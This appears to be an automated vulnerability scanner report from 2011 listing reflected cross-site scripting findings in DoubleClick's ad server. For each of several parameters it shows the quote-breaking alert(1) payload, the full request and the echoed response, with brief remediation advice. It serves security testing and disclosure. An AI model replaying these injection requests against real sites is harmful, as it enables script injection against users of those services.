document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:38:57 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe6f88'-alert(1)-'5d816f81708&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B39213497\"> ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e89c3"-alert(1)-"ea8dd10c3f1 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe89c3"-alert(1)-"ea8dd10c3f1&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7891 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:08:55 GMT Expires: Thu, 03 Feb 2011 16:08:55 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe89c3"-alert(1)-"ea8dd10c3f1&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604"); var fscUrl = url; ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1934"-alert(1)-"9335474a73d was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073b1934"-alert(1)-"9335474a73d&adurl=;ord=1145778283?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7891 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:09:00 GMT Expires: Thu, 03 Feb 2011 16:09:00 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073b1934"-alert(1)-"9335474a73d&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0bb5'-alert(1)-'b56bd520db3 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073f0bb5'-alert(1)-'b56bd520db3&adurl=;ord=1145778283?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7891 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:09:01 GMT Expires: Thu, 03 Feb 2011 16:09:01 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073f0bb5'-alert(1)-'b56bd520db3&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604\"> ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af15d"-alert(1)-"24557353392 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1af15d"-alert(1)-"24557353392&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7857 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:08:56 GMT Expires: Thu, 03 Feb 2011 16:08:56 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:38:57 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... j0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1af15d"-alert(1)-"24557353392&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B39213497"); var fscUrl = url; var f ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f94ae'-alert(1)-'43c15411da1 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1f94ae'-alert(1)-'43c15411da1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7891 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:08:56 GMT Expires: Thu, 03 Feb 2011 16:08:56 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... j0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1f94ae'-alert(1)-'43c15411da1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604\"> ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23ee8'-alert(1)-'ebf157e0bd6 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q23ee8'-alert(1)-'ebf157e0bd6&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7891 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:08:59 GMT Expires: Thu, 03 Feb 2011 16:08:59 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q23ee8'-alert(1)-'ebf157e0bd6&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604\"> ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4ef6"-alert(1)-"6c82ad39022 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Qe4ef6"-alert(1)-"6c82ad39022&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7857 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:08:58 GMT Expires: Thu, 03 Feb 2011 16:08:58 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:38:57 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Qe4ef6"-alert(1)-"6c82ad39022&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B39213497"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4c51'-alert(1)-'a046432a509 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=lb4c51'-alert(1)-'a046432a509&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7891 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:08:53 GMT Expires: Thu, 03 Feb 2011 16:08:53 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... k\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/23c/%2a/k%3B234019457%3B1-0%3B0%3B57865897%3B2321-160/600%3B40155604/40173391/4%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lb4c51'-alert(1)-'a046432a509&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2Nt ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95ce4"-alert(1)-"4bb60c57e4a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l95ce4"-alert(1)-"4bb60c57e4a&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7891 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:08:53 GMT Expires: Thu, 03 Feb 2011 16:08:53 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/23c/%2a/k%3B234019457%3B1-0%3B0%3B57865897%3B2321-160/600%3B40155604/40173391/4%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l95ce4"-alert(1)-"4bb60c57e4a&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2Nt ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d464"-alert(1)-"0d57c46e691 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=9d464"-alert(1)-"0d57c46e691 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7515 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:06:25 GMT Expires: Thu, 03 Feb 2011 16:06:25 GMT
